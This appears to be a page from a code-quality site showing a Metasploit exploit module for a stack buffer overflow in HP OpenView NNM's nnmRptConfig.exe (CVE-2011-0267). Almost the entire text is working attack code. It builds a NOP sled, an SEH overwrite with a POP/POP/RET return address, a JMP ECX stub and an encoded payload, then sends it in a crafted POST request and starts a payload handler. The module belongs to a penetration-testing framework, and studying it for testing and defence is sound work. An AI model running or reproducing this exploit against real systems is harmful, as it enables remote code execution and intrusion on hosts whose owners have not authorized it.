modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb from rapid7/metasploit-framework

modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb
Summary

Maintainability

25 mins
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info={})
    super(update_info(info,
      'Name'        => "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",
      'Description' => %q{
        This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,
        the overflow occurs during a ov.sprintf_new() call, which allows an attacker to
        overwrite data on the stack, and gain arbitrary code execution.
      },
      'License'     => MSF_LICENSE,
      'Author'      => ['sinn3r'],
      'References'  =>
        [
          ['CVE', '2011-0267'],
          ['OSVDB', '70473'],
          ['ZDI', '11-009'],
        ],
      'Payload' =>
        {
          'BadChars' => "\x00\x26\x2b",
        },
      'DefaultOptions' =>
        {
          'EXITFUNC' => "seh",
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Platform' => 'win',
      'Targets'  =>
        [
          [
            'NNM 7.53 - Windows Server 2003 Ent', {
              'Ret'           => 0x5A30532D,  #POP/POP/RET OvWww.dll
              'Offset'        => 46919,       #Offset to SEH chain
              'Pops'          => 13,          #Number of POPADs needed to find a bigger space with our payload
              'Payloadoffset' => 57,          #Offset to the payload
          }],
        ],
      'DisclosureDate' => '2011-01-10'))
  end

  def exploit
    nops = make_nops(1000)*70

    sploit  = nops[0, target['Offset']]
    sploit << generate_seh_record(target.ret)
    sploit << "\x61"*target['Pops']
    sploit << "\xff\xe1"  #JMP ECX
    sploit << nops[0, target['Payloadoffset']]
    sploit << payload.encoded
    sploit << nops[0, 70000-sploit.length]

    data  = "Content&Action=Create&"
    data << "Template=Avail/CRAvail&"
    data << "Operation=Apply&"
    data << "Params=schdParams+nameParams&"
    data << "schdParams=#{sploit}%7Cmonthtodate&"
    data << "nameParams=text1%3DAAAA%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1"

    connect
    send_request_raw({
      'uri'     => '/OvCgi/nnmRptConfig.exe',
      'data'    => data,
      'version' => '1.1',
      'method'  => 'POST',
      'headers' => {
        'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language' => 'en-us,en;q=0.5',
        'Accept-Encoding' => 'gzip,deflate',
        'Accept-Chrarset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
        'Keep-Alive'      => '300',
        'Connection'      => 'Keep-Alive',
        'Cache-Control'   => 'mag-age=0',
        'Content-Type'    => 'application/x-www-form-urlencoded',
      }
    }, 3)

    handler
    disconnect
  end
end